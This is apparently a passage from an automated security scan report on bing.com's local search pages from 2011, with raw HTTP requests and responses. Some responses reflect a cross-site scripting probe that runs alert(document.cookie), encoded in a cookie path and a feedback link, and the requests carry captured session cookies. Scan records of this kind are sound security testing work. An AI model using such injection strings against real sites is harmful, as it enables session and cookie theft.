Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: f4d43589310840319542d23ff07183eb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js
Content-Length: 18141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=js%2c%20undefined%2c%20aa461'-alert(document.cookie)-'6f0e1fe887b&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3djs%252c%2bundefined%252c%2baa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b%26cb%3d20110127.750" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.3. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/aa461'-alert(&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b18f22ca108041f092c7441b3e508e6b
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(&/undefined/js
Content-Length: 17463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=js%2c%20undefined%2c%20aa461'-alert(&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3djs%252c%2bundefined%252c%2baa461'-alert(%26%26cb%3d20110127.750" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.4. http://www.bing.com/local/details.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/details.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:38:07 GMT
Last-Modified: Fri, 11 Feb 2011 22:38:07 GMT
X-BM-TraceID: 1d919a3be99d459db6f09a5078524a98
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 306557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns = "http://www.w3.org/1999/xhtml" xmlns:web = "http://schema
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<div id = "atAGlance" class = "at-a-glance-module">
   <img src="http://blufiles.storage.msn.com/y1prg_6cJYChXMBpSrR2CyVt1M5A9kccp3DqvLzulHMmftXMCVLtB8CNqRIgBUdXfqYIFJFlIDhox0" class="biz-photo" alt="Hotel Helix" />

   <span class = "openClosedSign">
...[SNIP]...
</span>
   <a id="contactCard_website" title="Website" class="website" href="http://www.hotelhelix.com/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">Website</a>
...[SNIP]...
<span class = "sentiment">
                                       Great Experience at Hotel Helix Washington, DC....
                                       <a id="scorecard_scorecardTable_scorecard0_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       Other perks include: cheetah bathrobes, free Aveda products, daily newspaper, and free wireless Internet....
                                       <a id="scorecard_scorecardTable_scorecard1_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       The decor is very modern, bright, and upbeat....
                                       <a id="scorecard_scorecardTable_scorecard2_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       I love the fact that the king size bed is in it's own alcove and that it is hidden by lime green drapes....
                                       <a id="scorecard_scorecardTable_scorecard3_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       Other perks include: cheetah bathrobes, free Aveda products, daily newspaper, and free wireless Internet....
                                       <a id="scorecard_scorecardTable_scorecard4_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       Wholefoods is 2 block away, the White House is 6 blks, and shopping is an 8 minute walk....
                                       <a id="scorecard_scorecardTable_scorecard5_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
m currently writing this review at the hotel. I wish I did not have to leave the Helix. I have traveled a lot and stayed in many hotels but this is one of the most unique hotels by far. The d...
                   <a href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" id="reviews_userReviewsList_ctl01_A2" class="moreLink">Read full review</a>
...[SNIP]...
<li class = "ad">
<a href="http://13391.r.msn.com/?ld=4vkxUEX7Tx8QDc8MI49za5qV6Q7dHdq19iG8CrAlKGTjOfGzgmuxWpVYGvhkFN01ZfnO66eqtBB_o1kpdrUxkO4eP_mYW6ZXvh75d7qMFJKPGKjwC9C0CX3erScIx2yKKs-FjqwemN1BHXJVjRG_Gt1tQkJQII-KaprRv-VbmB1Yt3AcCe2YEQ-Bqgu3HGgjgi46liVsWNOmHrDxK3ForowA5pY5ZFPhmoT0LOM4OHt8iU7TuJxNdo8VU9zxs-hPjAEnGjoymsKOaTa7CgvBiq4jVUCUwnwFx6rXZuKlrm6x4B-_QEECZjcz1CVbjYgIeDQmmcHWi2NiqwvXjqty7kIv6rSXbkocxBBA" class="head" onclick="window.open(this.href); return false;">Washington Flights</a>
<a href="http://13391.r.msn.com/?ld=4vkxUEX7Tx8QDc8MI49za5qV6Q7dHdq19iG8CrAlKGTjOfGzgmuxWpVYGvhkFN01ZfnO66eqtBB_o1kpdrUxkO4eP_mYW6ZXvh75d7qMFJKPGKjwC9C0CX3erScIx2yKKs-FjqwemN1BHXJVjRG_Gt1tQkJQII-KaprRv-VbmB1Yt3AcCe2YEQ-Bqgu3HGgjgi46liVsWNOmHrDxK3ForowA5pY5ZFPhmoT0LOM4OHt8iU7TuJxNdo8VU9zxs-hPjAEnGjoymsKOaTa7CgvBiq4jVUCUwnwFx6rXZuKlrm6x4B-_QEECZjcz1CVbjYgIeDQmmcHWi2NiqwvXjqty7kIv6rSXbkocxBBA" class="body" onclick="window.open(this.href); return false;">Book Now & Save up to 65% on Washington Flights, plus Get $10 Off.</a>
<a href="http://13391.r.msn.com/?ld=4vkxUEX7Tx8QDc8MI49za5qV6Q7dHdq19iG8CrAlKGTjOfGzgmuxWpVYGvhkFN01ZfnO66eqtBB_o1kpdrUxkO4eP_mYW6ZXvh75d7qMFJKPGKjwC9C0CX3erScIx2yKKs-FjqwemN1BHXJVjRG_Gt1tQkJQII-KaprRv-VbmB1Yt3AcCe2YEQ-Bqgu3HGgjgi46liVsWNOmHrDxK3ForowA5pY5ZFPhmoT0LOM4OHt8iU7TuJxNdo8VU9zxs-hPjAEnGjoymsKOaTa7CgvBiq4jVUCUwnwFx6rXZuKlrm6x4B-_QEECZjcz1CVbjYgIeDQmmcHWi2NiqwvXjqty7kIv6rSXbkocxBBA" class="site" onclick="window.open(this.href); return false;">www.CheapOair.com/Washington</a>
...[SNIP]...
<li class = "ad">
<a href="http://814530.r.msn.com/?ld=4vo8TUM0CpB4jsm8P4mO5Er1ieDYKHGuRFoVl_B8MT0EF9X6RUjh05M_9-509_kYKffh3UqZo9ITrptaQl5MieHVJ8X9DxTxpTPYWgNE9L4-YJpFIZdEbYfSTLU-0eIslgZSzsB7NMhKDPRLHV85iRa9BVFbRgcvRt57hi0Y1jy102iFRJbs3ePN0CAONnfHvVOycW866H2cGBCqC5pmZGZahcAilGylY_SYPE9HKl2Kg1VAlMxs2-9dPoJ8XW3hkq58PEaBAmY3M9IMAr6u6hGcEY94iQdYCALdPdQecRagBVCIridx73nVM" class="head" onclick="window.open(this.href); return false;">Washington DC Tours</a>
<a href="http://814530.r.msn.com/?ld=4vo8TUM0CpB4jsm8P4mO5Er1ieDYKHGuRFoVl_B8MT0EF9X6RUjh05M_9-509_kYKffh3UqZo9ITrptaQl5MieHVJ8X9DxTxpTPYWgNE9L4-YJpFIZdEbYfSTLU-0eIslgZSzsB7NMhKDPRLHV85iRa9BVFbRgcvRt57hi0Y1jy102iFRJbs3ePN0CAONnfHvVOycW866H2cGBCqC5pmZGZahcAilGylY_SYPE9HKl2Kg1VAlMxs2-9dPoJ8XW3hkq58PEaBAmY3M9IMAr6u6hGcEY94iQdYCALdPdQecRagBVCIridx73nVM" class="body" onclick="window.open(this.href); return false;">See DC in One Day! Our daily tours show you all the DC attractions.</a>
<a href="http://814530.r.msn.com/?ld=4vo8TUM0CpB4jsm8P4mO5Er1ieDYKHGuRFoVl_B8MT0EF9X6RUjh05M_9-509_kYKffh3UqZo9ITrptaQl5MieHVJ8X9DxTxpTPYWgNE9L4-YJpFIZdEbYfSTLU-0eIslgZSzsB7NMhKDPRLHV85iRa9BVFbRgcvRt57hi0Y1jy102iFRJbs3ePN0CAONnfHvVOycW866H2cGBCqC5pmZGZahcAilGylY_SYPE9HKl2Kg1VAlMxs2-9dPoJ8XW3hkq58PEaBAmY3M9IMAr6u6hGcEY94iQdYCALdPdQecRagBVCIridx73nVM" class="site" onclick="window.open(this.href); return false;">www.OnBoardDCTours.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4vTYb3z41OmApcTmMgjZO272kUkuwiwgJGWH-MppDugb83yoa0cE1lI56OWNWopGPGRawsVP1dcPY_PId7vQb2ZXSB8-xia8fz4jHzNlzIpZm553B67F7_tb9Cmjd1OAlOFIRC7T5l1CHs6HF6gWlwsdIW5ZEJ6WXxn_7e3ISKvTNc4IHakZmKPMBIJXvHjes_49ubuf9an74gdwnJN-SeGxWN9uOQBi2I8YJMuHc3KCxQ9PkJh5xUf_YWuUU84u236gy7FFhzyIYAuK-IpDCXRbT-bDsRz55Bvd7EIt_9vNUihyHtc94XtYMhE97AZVUrNVQJTI7dfPjSHFAkKrtEZPjM_MsQJmNzPTCSjL5iiTFXIwDYx2Nt81z17Wc329bzxZtEbWrQ9GZE" class="head" onclick="window.open(this.href); return false;">100 Hotels Washington DC</a>
<a href="http://0.r.msn.com/?ld=4vTYb3z41OmApcTmMgjZO272kUkuwiwgJGWH-MppDugb83yoa0cE1lI56OWNWopGPGRawsVP1dcPY_PId7vQb2ZXSB8-xia8fz4jHzNlzIpZm553B67F7_tb9Cmjd1OAlOFIRC7T5l1CHs6HF6gWlwsdIW5ZEJ6WXxn_7e3ISKvTNc4IHakZmKPMBIJXvHjes_49ubuf9an74gdwnJN-SeGxWN9uOQBi2I8YJMuHc3KCxQ9PkJh5xUf_YWuUU84u236gy7FFhzyIYAuK-IpDCXRbT-bDsRz55Bvd7EIt_9vNUihyHtc94XtYMhE97AZVUrNVQJTI7dfPjSHFAkKrtEZPjM_MsQJmNzPTCSjL5iiTFXIwDYx2Nt81z17Wc329bzxZtEbWrQ9GZE" class="body" onclick="window.open(this.href); return false;">Save up to 50% on your reservation. Book online now. Pay at the hotel.</a>
<a href="http://0.r.msn.com/?ld=4vTYb3z41OmApcTmMgjZO272kUkuwiwgJGWH-MppDugb83yoa0cE1lI56OWNWopGPGRawsVP1dcPY_PId7vQb2ZXSB8-xia8fz4jHzNlzIpZm553B67F7_tb9Cmjd1OAlOFIRC7T5l1CHs6HF6gWlwsdIW5ZEJ6WXxn_7e3ISKvTNc4IHakZmKPMBIJXvHjes_49ubuf9an74gdwnJN-SeGxWN9uOQBi2I8YJMuHc3KCxQ9PkJh5xUf_YWuUU84u236gy7FFhzyIYAuK-IpDCXRbT-bDsRz55Bvd7EIt_9vNUihyHtc94XtYMhE97AZVUrNVQJTI7dfPjSHFAkKrtEZPjM_MsQJmNzPTCSjL5iiTFXIwDYx2Nt81z17Wc329bzxZtEbWrQ9GZE" class="site" onclick="window.open(this.href); return false;">www.booking.com/Washington-DC</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4v3Xpl47bMdlO24kYNUEPUDDadernmQitAmiiddfWbDbN88cdDY5lDBsSzShSyulQ_lmkPpva5Xf_328jd7YOqpmRn2DpsOpFmcgFyrTi-eRHyhTlC9qLXSkXBXk7cmjSZKKerIOF_8E4I0zS5TtKMbTMNNqWxkQ5Qx19fgcQgfa4DYx8YYqMwVc6IrWdLn8-p7dlF2VofIAkUPJ2pVeCrIbc2Y0zboeA5fm3glEPpnBIv5PX-1uFq6LqWqAHIHxfga7XaTvylhsA9FKOY2ZTUR6hef4G-SgIWWsUukRykTb2bybWFzhOLnE1L4EFiuY9i_SxW9H4QrZ24-UFgmJPeFzwUR2ApnV45E4xJHLReAPE1VAlMA8Bai0yN63h5M-kcs7of4hAmY3M9xN_tyPZnyf0-nnn8tNgAIJbi6Gq-Uu7bPErv_4Re2MY" class="head" onclick="window.open(this.href); return false;">Hotel in Washington D.C.</a>
<a href="http://0.r.msn.com/?ld=4v3Xpl47bMdlO24kYNUEPUDDadernmQitAmiiddfWbDbN88cdDY5lDBsSzShSyulQ_lmkPpva5Xf_328jd7YOqpmRn2DpsOpFmcgFyrTi-eRHyhTlC9qLXSkXBXk7cmjSZKKerIOF_8E4I0zS5TtKMbTMNNqWxkQ5Qx19fgcQgfa4DYx8YYqMwVc6IrWdLn8-p7dlF2VofIAkUPJ2pVeCrIbc2Y0zboeA5fm3glEPpnBIv5PX-1uFq6LqWqAHIHxfga7XaTvylhsA9FKOY2ZTUR6hef4G-SgIWWsUukRykTb2bybWFzhOLnE1L4EFiuY9i_SxW9H4QrZ24-UFgmJPeFzwUR2ApnV45E4xJHLReAPE1VAlMA8Bai0yN63h5M-kcs7of4hAmY3M9xN_tyPZnyf0-nnn8tNgAIJbi6Gq-Uu7bPErv_4Re2MY" class="body" onclick="window.open(this.href); return false;">There's more to enjoy! Book unique offer. Instant Service 800-996-8916</a>
<a href="http://0.r.msn.com/?ld=4v3Xpl47bMdlO24kYNUEPUDDadernmQitAmiiddfWbDbN88cdDY5lDBsSzShSyulQ_lmkPpva5Xf_328jd7YOqpmRn2DpsOpFmcgFyrTi-eRHyhTlC9qLXSkXBXk7cmjSZKKerIOF_8E4I0zS5TtKMbTMNNqWxkQ5Qx19fgcQgfa4DYx8YYqMwVc6IrWdLn8-p7dlF2VofIAkUPJ2pVeCrIbc2Y0zboeA5fm3glEPpnBIv5PX-1uFq6LqWqAHIHxfga7XaTvylhsA9FKOY2ZTUR6hef4G-SgIWWsUukRykTb2bybWFzhOLnE1L4EFiuY9i_SxW9H4QrZ24-UFgmJPeFzwUR2ApnV45E4xJHLReAPE1VAlMA8Bai0yN63h5M-kcs7of4hAmY3M9xN_tyPZnyf0-nnn8tNgAIJbi6Gq-Uu7bPErv_4Re2MY" class="site" onclick="window.open(this.href); return false;">www.InterContinental.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://3915.r.msn.com/?ld=4vuAyxSvlGFq2pKPRN2Ft3GHdD5Bj8qw5XXRC9dKQ4A1MbqRTeu-RukV8lOpJ8OQO2zyMSxaTvVivFX2DlBpyuI9AfAhHF_lD_ExSQPxgl2KfHX74yBv0bK9hvVDJtZYKGDesJipM4hpKhkghNAdWCEh3UaoZWk9qeXafoTqScqVISvt1YK1Oss125IblUt2mW5U7jDrSZOBI9Yxt7v8axaocqudA7Fpg7pdp60hiNMZm_bD3SGJ5QqNmvpE8r_rDDM3lBBghUYC3Kt_Yk3A11RCexU2KtoNHRDpIECZCIprWq2184nO4OZln37dywnHmqVYDocXqpJ8MhhjkMb1wxVohPYzg_h_-xp-p4OpUXWwuqdauU1XUpkm71F2KrIbM-qm9izsUhluH1p_-EuoiEAv_p7xqeIJW6jiHZKpevt2inQTIXh3shfYILtxqZqFm3NVQJTFt6KKgzl8nzBocL_zNWVagQJmNzPerVpI9qhMAjnzHQlhLkvv4TarNPUoo4owQae_npFse2" class="head" onclick="window.open(this.href); return false;">Washington Hotels</a>
<a href="http://3915.r.msn.com/?ld=4vuAyxSvlGFq2pKPRN2Ft3GHdD5Bj8qw5XXRC9dKQ4A1MbqRTeu-RukV8lOpJ8OQO2zyMSxaTvVivFX2DlBpyuI9AfAhHF_lD_ExSQPxgl2KfHX74yBv0bK9hvVDJtZYKGDesJipM4hpKhkghNAdWCEh3UaoZWk9qeXafoTqScqVISvt1YK1Oss125IblUt2mW5U7jDrSZOBI9Yxt7v8axaocqudA7Fpg7pdp60hiNMZm_bD3SGJ5QqNmvpE8r_rDDM3lBBghUYC3Kt_Yk3A11RCexU2KtoNHRDpIECZCIprWq2184nO4OZln37dywnHmqVYDocXqpJ8MhhjkMb1wxVohPYzg_h_-xp-p4OpUXWwuqdauU1XUpkm71F2KrIbM-qm9izsUhluH1p_-EuoiEAv_p7xqeIJW6jiHZKpevt2inQTIXh3shfYILtxqZqFm3NVQJTFt6KKgzl8nzBocL_zNWVagQJmNzPerVpI9qhMAjnzHQlhLkvv4TarNPUoo4owQae_npFse2" class="body" onclick="window.open(this.href); return false;">Free Internet & Hot Breakfast Bar. Book Lowest Rates Direct!</a>
<a href="http://3915.r.msn.com/?ld=4vuAyxSvlGFq2pKPRN2Ft3GHdD5Bj8qw5XXRC9dKQ4A1MbqRTeu-RukV8lOpJ8OQO2zyMSxaTvVivFX2DlBpyuI9AfAhHF_lD_ExSQPxgl2KfHX74yBv0bK9hvVDJtZYKGDesJipM4hpKhkghNAdWCEh3UaoZWk9qeXafoTqScqVISvt1YK1Oss125IblUt2mW5U7jDrSZOBI9Yxt7v8axaocqudA7Fpg7pdp60hiNMZm_bD3SGJ5QqNmvpE8r_rDDM3lBBghUYC3Kt_Yk3A11RCexU2KtoNHRDpIECZCIprWq2184nO4OZln37dywnHmqVYDocXqpJ8MhhjkMb1wxVohPYzg_h_-xp-p4OpUXWwuqdauU1XUpkm71F2KrIbM-qm9izsUhluH1p_-EuoiEAv_p7xqeIJW6jiHZKpevt2inQTIXh3shfYILtxqZqFm3NVQJTFt6KKgzl8nzBocL_zNWVagQJmNzPerVpI9qhMAjnzHQlhLkvv4TarNPUoo4owQae_npFse2" class="site" onclick="window.open(this.href); return false;">www.HolidayInnExpress.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4v4qmLIIlSTrcn8PDia5hE85qemRjTTKtzxiiWGXTIyFo1RuaqCstrrdGNB19Z2i_lsbpwa-0c1roKreaVYiesLRIwpruNB6970n1QIJ2tmsA6Y8qhf9U1dCDPI7HitGj6zqVhhU3TUCaKmIYHMuHhc5BSQsrrsTKquePDq_tjZPxQ7nq8w_ZmyllkcyrmLuluKM0zsqNi3Gsva3sTeFTKYqJ7OvzLxu7YyTxPdOXXiPzgn0GYfSAVZyF-vxJk3N6q0UU9AjfRCjXb75WkdOzVcHIdhNQ8dEUTmkB3Sriq0IHrUvRNtd_HnIgp7peo7atmdtEYoKg8njxhhOfRqxUTuhaBH_JG48P6IKai54owr-H2jqCE7bIOX20bx2rMniQLfJB2DBUMubz3WcGmk8JIqLmtV8Fsk07Os6IAMtQv03s1VAlMwY7T_7ysGbN0m6r5FGRr-hAmY3M9TdSxsOoVHBw6zSH2cY4P7ZVc2ee_AAQYOcdabseuBoo" class="head" onclick="window.open(this.href); return false;">washington hotels</a>
<a href="http://0.r.msn.com/?ld=4v4qmLIIlSTrcn8PDia5hE85qemRjTTKtzxiiWGXTIyFo1RuaqCstrrdGNB19Z2i_lsbpwa-0c1roKreaVYiesLRIwpruNB6970n1QIJ2tmsA6Y8qhf9U1dCDPI7HitGj6zqVhhU3TUCaKmIYHMuHhc5BSQsrrsTKquePDq_tjZPxQ7nq8w_ZmyllkcyrmLuluKM0zsqNi3Gsva3sTeFTKYqJ7OvzLxu7YyTxPdOXXiPzgn0GYfSAVZyF-vxJk3N6q0UU9AjfRCjXb75WkdOzVcHIdhNQ8dEUTmkB3Sriq0IHrUvRNtd_HnIgp7peo7atmdtEYoKg8njxhhOfRqxUTuhaBH_JG48P6IKai54owr-H2jqCE7bIOX20bx2rMniQLfJB2DBUMubz3WcGmk8JIqLmtV8Fsk07Os6IAMtQv03s1VAlMwY7T_7ysGbN0m6r5FGRr-hAmY3M9TdSxsOoVHBw6zSH2cY4P7ZVc2ee_AAQYOcdabseuBoo" class="body" onclick="window.open(this.href); return false;">Book Lowest Hotel Rates Direct! Luxurious Beds & Great Amenities.</a>
